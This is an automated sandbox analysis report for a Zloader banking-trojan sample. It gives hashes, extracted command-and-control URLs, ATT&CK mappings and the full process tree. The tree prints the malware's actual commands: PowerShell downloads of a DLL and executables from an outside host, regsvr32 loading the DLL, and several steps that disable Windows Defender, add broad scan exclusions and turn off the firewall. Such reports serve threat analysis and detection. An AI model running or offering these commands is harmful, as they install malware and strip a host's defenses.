zloader | 06f39b7745fc370b817fc6f4ba226ac2f39994bf7da7296a99feb68d730ed174

Analysis

max time kernel
33s
max time network
111s
platform
windows10_x64
resource
win10v20210410
submitted
05-08-2021 13:32

Sharing

Copy URL

Twitter E-mail

Reason

Remote task has failed: Machine shutdown

Report Analysis Logs

General

Target

5f4069c9716193f3592946f168f459db.exe
Size

165KB
MD5

5f4069c9716193f3592946f168f459db
SHA1

e16fe562704106b55d40c3f6525dd1a56a5f5df9
SHA256

06f39b7745fc370b817fc6f4ba226ac2f39994bf7da7296a99feb68d730ed174
SHA512

88118e51ec79694f0b95be723342088e10bf37e72482a1bc1712f1bc529ab1f0a9b447172793b3be1e099ca82b8fbc9c1c07b9f7d690f3a04ad94b666e4bc33c

Score

10^/10

zloader vasja vasja botnet evasion persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

9 2368 powershell.exe
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

1092 regsvr32.exe

flow	pid	process
9	2368	powershell.exe

pid	process
1092	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

5f4069c9716193f3592946f168f459db.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	5f4069c9716193f3592946f168f459db.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	5f4069c9716193f3592946f168f459db.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2368 powershell.exe
2368 powershell.exe
2368 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2368 powershell.exe

pid	process
2368	powershell.exe
2368	powershell.exe
2368	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2368	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

5f4069c9716193f3592946f168f459db.execmd.exeregsvr32.exe

description	pid	process	target process
PID 1808 wrote to memory of 1216	1808	5f4069c9716193f3592946f168f459db.exe	cmd.exe
PID 1808 wrote to memory of 1216	1808	5f4069c9716193f3592946f168f459db.exe	cmd.exe
PID 1216 wrote to memory of 2368	1216	cmd.exe	powershell.exe
PID 1216 wrote to memory of 2368	1216	cmd.exe	powershell.exe
PID 1216 wrote to memory of 4088	1216	cmd.exe	regsvr32.exe
PID 1216 wrote to memory of 4088	1216	cmd.exe	regsvr32.exe
PID 4088 wrote to memory of 1092	4088	regsvr32.exe	regsvr32.exe
PID 4088 wrote to memory of 1092	4088	regsvr32.exe	regsvr32.exe
PID 4088 wrote to memory of 1092	4088	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\5f4069c9716193f3592946f168f459db.exe
"C:\Users\Admin\AppData\Local\Temp\5f4069c9716193f3592946f168f459db.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1808

C:\Windows\SYSTEM32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://cmhxwbkplijrlvswubai.com/JavaE.dll -OutFile JavaE.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368

C:\Windows\system32\regsvr32.exe
regsvr32 JavaE.dll
3⤵
- Suspicious use of WriteProcessMemory
PID:4088

C:\Windows\SysWOW64\regsvr32.exe
JavaE.dll
4⤵
- Loads dropped DLL
PID:1092

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:1720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://cmhxwbkplijrlvswubai.com/nsudo.bat -OutFile nsudo.bat
3⤵
PID:8

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:416

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:2684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://cmhxwbkplijrlvswubai.com/javase.exe -OutFile javase.exe
4⤵
PID:1792

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
PID:3500

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T sc config WinDefend start= disabled
4⤵
PID:2900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
4⤵
PID:3716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
4⤵
PID:2116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
4⤵
PID:1816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
4⤵
PID:3148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
4⤵
PID:1296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
4⤵
PID:364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
4⤵
PID:968

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
5⤵
PID:3456

C:\Windows\system32\shutdown.exe
shutdown.exe /r /t 00
4⤵
PID:736

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3acd855 /state1:0x41c64e6d
1⤵
PID:644

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
42d4b1d78e6e092af15c7aef34e5cf45

SHA1
6cf9d0e674430680f67260194d3185667a2bb77b

SHA256
c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

SHA512
d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d2c571cbf47a6b0ef3da19725b865740

SHA1
fe2fa093c1c7638e1b310ef672c7508046a9eb53

SHA256
c4a9b37c9d1143ec0ce9af9e644ccf0e270d64e4769024e58c598f29e4ca55d3

SHA512
648e22dcf72fd3aa2a1c0ec56c60beb5bce775b8dc5f9cefa3983bf134b3370c4401474b205fb622b7367735ae10e3c5ac69e8a75fbc6f96a873d42ef3ba72d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
64034b4f3e2e591b4db033ea32f1c134

SHA1
d7eff14c0e606904c876b5df60f375ef3bbf88f0

SHA256
9e859e5fca3baaff854a8b1078d854274056d82eafe2806932b9134b877d6d6e

SHA512
9c3b0cac8c3329146a8ae42de771d2760f4290fc8993359a8b39b577ebe7bf68b3223f23173d04d5f93f1e0151a8508e39c3cae27f79a6b9df1aca263258bd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
77827b931a9a94d80393909f11b2ab01

SHA1
23b100a13ddba48502bb8493f0a37046fca92d7c

SHA256
6ed33739115d2cb46f710d859474355e15e687b79b9e5346e902a1d9ee54efd2

SHA512
23acdd60f775f5c843e5139ff2732fe0383f73b490fbe58cf8b08e7a4eaf2055b3a89fbe9aa43213f69e06a5db267f3f227d29861b11c3327f515f17c49e41c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8973e9c694699301cc4957b7f341e859

SHA1
83aa7c3a87e32db162b4850374818aaf669fd085

SHA256
db58503ba996400641b319e789c7a9af637df7bf0aa80d8ce0806be47a80f668

SHA512
434d7003dfa5e620a2273ec2c128fe08c3bce4a51a497a6865e40371245bbf563f0930984c3393a47612898bbabe543371d6fc5e9edd1dd61198e83da1571b0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0b8adbb09edacb07e62e2e9491dbbe5e

SHA1
04967f001bae4a5fdb985fd1f4854c68ad1d3dbe

SHA256
f7a289f8926dda1c84b3e9e8eca4ce75166bb28174e653fd42498e358d22cf28

SHA512
e7758ccdb9c35df4fec6329c07b76fb6fccf1ed384644cb01dbc24835584eeacf7cb614d4e03b86abaf47abecb3e6e1c93b9715e0fb7bc86a85d9b2d758a187e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
97155e435f71e07ef3e42e5fb275d99f

SHA1
98e470626fc9e5a71f4322b2767436a504b80c6b

SHA256
ad05cd979c5edfe8e3a68c2142bc0b2e3979ccce84869bac7e423c4aa8e5951a

SHA512
31889e37e11c9b5098d9fe4033bb961d1987d1d6e8d4ba46a4787334ce8a2819e57c2785412fc149fed76f7c0f63e1197d5e444b3aaf2ffa18807e085c21de00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ffd8d9921267ca5098987ad7d267a6c6

SHA1
c24409a476a7e7671c84966de3dbb04f188582a7

SHA256
a716697b00fc3918a98be519e32295969109a9474879c943070f28a29e2f49aa

SHA512
6abdc79ad2c0959326ea350ce975ab8b6d851256ef318a3aac37f7bbd8f6fc7c22c4a0cc42b794499f82d4f5627f988a32af0881c1a3d9d2cebbe84287397d39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
48f122886bc282567e0dd1c585432f06

SHA1
f0b01fe26f07bfa9ce0ffc0221790cd9365e0558

SHA256
c4ce746b1c001f6a0f7c2d829aae302dadffe2c32a202fdb16be84aa4a104fd0

SHA512
9e2118c85383dcc4f9ff1fa592e0382ff9bb039540a4de4a2a33159dbfa987697896a548099921e87ea55db60428f940d373a3708837c2560a5702615e6c5450

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2b6a0c95adbf2bd0a342752b0d6480ed

SHA1
67ed6ec25b0746f2612b8c05888bf615c5d64e34

SHA256
3f2b6155e9fa4c6f38597f38beb869977524af1a1f13735cbfda4b3de05cc862

SHA512
5c824fd5c85cec2962f4ade6153357095ba5c323b928b28cf8aeaec205556ed952dec0d179abb580b94a4a483b2a3cb7ecd8a7cb664230c435c776b2f18087d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
39e9fef482c45f0458533569592fd548

SHA1
da0da4f4154a45f475a86b8b2c194a779759c6e6

SHA256
1c089f10e4ec48154d653ebed9fae458a09bf00c0b67bfddc37793043872a749

SHA512
f9e732b788e19c0f76163d5a037630de3b59c89ee8b136500e0ff6788a01f03fcf0dbc446f892f89315ef435a94c99b997f42aa06c2bb374cc9e43af09e26e7c

Download Submit
C:\Users\Admin\AppData\Roaming\JavaE.dll
MD5
86cef6c066a05b3f67123fbf638b6b01

SHA1
81618f8ecc48541c219aa974e4b16cab8f34203b

SHA256
86c37d778f584a2a3090ab170c8cd2fb3ddf952cde689b4c5a1efd74fc113a05

SHA512
1132f94eeb8ae5d4556841976789b648f2394a4089db2e6b43c2047cc87004f00e334e14a96c5ab0535aeb13f3bffc8d5e955d7435b9be2aba491bcbe92044d9

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\nsudo.bat
MD5
f539a64148825dfd117cb30426cdd1b8

SHA1
346396b89f44b8696a6da5be818e1b4d23bd4f9e

SHA256
80bf27664a28a2f00927320b78dc31363584427a8dd6f9de2145ee5dbd80f324

SHA512
4091ff3218cad34577198ede5b5dbd027bc0278bd851766137c1e22f3404838baa22815e5a3d65ef24f923ab067050a8bf2dce36fa9076f49818cd9cf5c7d7c4

Download Submit
\Users\Admin\AppData\Roaming\JavaE.dll
MD5
86cef6c066a05b3f67123fbf638b6b01

SHA1
81618f8ecc48541c219aa974e4b16cab8f34203b

SHA256
86c37d778f584a2a3090ab170c8cd2fb3ddf952cde689b4c5a1efd74fc113a05

SHA512
1132f94eeb8ae5d4556841976789b648f2394a4089db2e6b43c2047cc87004f00e334e14a96c5ab0535aeb13f3bffc8d5e955d7435b9be2aba491bcbe92044d9

Download Submit
memory/8-147-0x0000000000000000-mapping.dmp

Download
memory/8-163-0x000001CD7CFB3000-0x000001CD7CFB5000-memory.dmp

Filesize
8KB

Download
memory/8-162-0x000001CD7CFB0000-0x000001CD7CFB2000-memory.dmp

Filesize
8KB

Download
memory/8-171-0x000001CD7CFB6000-0x000001CD7CFB8000-memory.dmp

Filesize
8KB

Download
memory/364-441-0x00000230DFC06000-0x00000230DFC08000-memory.dmp

Filesize
8KB

Download
memory/364-402-0x0000000000000000-mapping.dmp

Download
memory/364-439-0x00000230DFC08000-0x00000230DFC09000-memory.dmp

Filesize
4KB

Download
memory/364-440-0x00000230DFC03000-0x00000230DFC05000-memory.dmp

Filesize
8KB

Download
memory/364-438-0x00000230DFC00000-0x00000230DFC02000-memory.dmp

Filesize
8KB

Download
memory/416-170-0x0000000000000000-mapping.dmp

Download
memory/736-459-0x0000000000000000-mapping.dmp

Download
memory/968-443-0x0000000000000000-mapping.dmp

Download
memory/968-455-0x00000204725C0000-0x00000204725C2000-memory.dmp

Filesize
8KB

Download
memory/968-456-0x00000204725C3000-0x00000204725C5000-memory.dmp

Filesize
8KB

Download
memory/968-460-0x00000204725C6000-0x00000204725C8000-memory.dmp

Filesize
8KB

Download
memory/1092-142-0x0000000002D50000-0x0000000002D51000-memory.dmp

Filesize
4KB

Download
memory/1092-143-0x0000000010000000-0x0000000010148000-memory.dmp

Filesize
1.3MB

Download
memory/1092-140-0x0000000000000000-mapping.dmp

Download
memory/1216-114-0x0000000000000000-mapping.dmp

Download
memory/1296-361-0x0000000000000000-mapping.dmp

Download
memory/1296-374-0x000001DB3DF03000-0x000001DB3DF05000-memory.dmp

Filesize
8KB

Download
memory/1296-372-0x000001DB3DF00000-0x000001DB3DF02000-memory.dmp

Filesize
8KB

Download
memory/1296-400-0x000001DB3DF06000-0x000001DB3DF08000-memory.dmp

Filesize
8KB

Download
memory/1296-401-0x000001DB3DF08000-0x000001DB3DF09000-memory.dmp

Filesize
4KB

Download
memory/1720-159-0x0000000000490000-0x00000000004B6000-memory.dmp

Filesize
152KB

Download
memory/1720-144-0x0000000000000000-mapping.dmp

Download
memory/1792-190-0x0000029C884B0000-0x0000029C884B2000-memory.dmp

Filesize
8KB

Download
memory/1792-174-0x0000000000000000-mapping.dmp

Download
memory/1792-191-0x0000029C884B3000-0x0000029C884B5000-memory.dmp

Filesize
8KB

Download
memory/1792-192-0x0000029C884B6000-0x0000029C884B8000-memory.dmp

Filesize
8KB

Download
memory/1816-280-0x0000000000000000-mapping.dmp

Download
memory/1816-324-0x0000027222798000-0x0000027222799000-memory.dmp

Filesize
4KB

Download
memory/1816-294-0x0000027222790000-0x0000027222792000-memory.dmp

Filesize
8KB

Download
memory/1816-295-0x0000027222793000-0x0000027222795000-memory.dmp

Filesize
8KB

Download
memory/1816-296-0x0000027222796000-0x0000027222798000-memory.dmp

Filesize
8KB

Download
memory/2116-293-0x0000014DBD9B8000-0x0000014DBD9B9000-memory.dmp

Filesize
4KB

Download
memory/2116-279-0x0000014DBD9B6000-0x0000014DBD9B8000-memory.dmp

Filesize
8KB

Download
memory/2116-241-0x0000000000000000-mapping.dmp

Download
memory/2116-277-0x0000014DBD9B0000-0x0000014DBD9B2000-memory.dmp

Filesize
8KB

Download
memory/2116-278-0x0000014DBD9B3000-0x0000014DBD9B5000-memory.dmp

Filesize
8KB

Download
memory/2368-132-0x000001759D773000-0x000001759D775000-memory.dmp

Filesize
8KB

Download
memory/2368-133-0x000001759D776000-0x000001759D778000-memory.dmp

Filesize
8KB

Download
memory/2368-116-0x0000000000000000-mapping.dmp

Download
memory/2368-122-0x00000175B6570000-0x00000175B6571000-memory.dmp

Filesize
4KB

Download
memory/2368-125-0x00000175B6720000-0x00000175B6721000-memory.dmp

Filesize
4KB

Download
memory/2368-131-0x000001759D770000-0x000001759D772000-memory.dmp

Filesize
8KB

Download
memory/2684-173-0x0000000000000000-mapping.dmp

Download
memory/2900-199-0x0000000000000000-mapping.dmp

Download
memory/3148-327-0x0000027A4E710000-0x0000027A4E712000-memory.dmp

Filesize
8KB

Download
memory/3148-328-0x0000027A4E713000-0x0000027A4E715000-memory.dmp

Filesize
8KB

Download
memory/3148-319-0x0000000000000000-mapping.dmp

Download
memory/3148-359-0x0000027A4E718000-0x0000027A4E719000-memory.dmp

Filesize
4KB

Download
memory/3148-358-0x0000027A4E716000-0x0000027A4E718000-memory.dmp

Filesize
8KB

Download
memory/3456-454-0x0000000000000000-mapping.dmp

Download
memory/3500-197-0x0000000000000000-mapping.dmp

Download
memory/3716-201-0x0000000000000000-mapping.dmp

Download
memory/3716-221-0x0000022EE7C16000-0x0000022EE7C18000-memory.dmp

Filesize
8KB

Download
memory/3716-220-0x0000022EE7C13000-0x0000022EE7C15000-memory.dmp

Filesize
8KB

Download
memory/3716-217-0x0000022EE7C10000-0x0000022EE7C12000-memory.dmp

Filesize
8KB

Download
memory/4088-138-0x0000000000000000-mapping.dmp

Download